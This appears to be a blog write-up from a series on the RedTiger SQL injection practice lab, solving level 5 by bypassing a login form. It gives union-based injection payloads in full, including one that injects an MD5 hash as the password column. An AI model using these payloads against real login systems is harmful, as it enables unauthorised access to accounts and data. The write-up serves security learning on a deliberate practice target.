SQL INJECTION(redtiger.lab)-Part4
Till now we have completed up to level 4 of redtiger lab and learned various ways of performing SQL Injection to extract information.
Today in this part we will be completing level 5 of the redtiger lab.
Now lets first complete level 5 . In level 5 we have to bypass the login system and the hint given is that it is not Blind(which means error can be seen ) and the password is md5-encrypted.
Now at first if we enter some random username and password its says no user found . so we must first by pass the username input.
So as we know that it is not blind SQL injection ,let’s try to generate some error by providing ‘ as an input in username and password field.
Here we get error:
mysql_num_rows() expects parameter 1 to be resource, boolean.
From this we can know that username can be boolean so
let try to bypass the username using query
username: hey’ union select 1 #
and password: hey
Here instead of hey you can use anything it doesn’t matter.
Now lets again try by increasing no of column of select statement to 2.
username :hey’ union select 1,2 #
and password: hey
Here it says login failed which means that we have successfully bypass the username but login failed because password is not bypassed.
So now to bypass password lets look into hint .It says that password is md5 encrypted.
Here from above we can see that there are two columns in the table and one of them is password and another is username now lets try to determine which columns is password for this lets try to enter following query.
- username : hey’ union select md5(‘hey’),2 #
and password: hey
Here the string in md5() and in password must be same.
Result of this query is login failed(just like shown in fig 4).
From this we came to know that if login is failing while putting password in column 1 then the password must be second column So now lets modify our query accordingly.
username : hey’ union select 1,md5(‘hey’) #
and password: hey
BINGO!!! We successfully bypass the login system.
Link to part 5:
References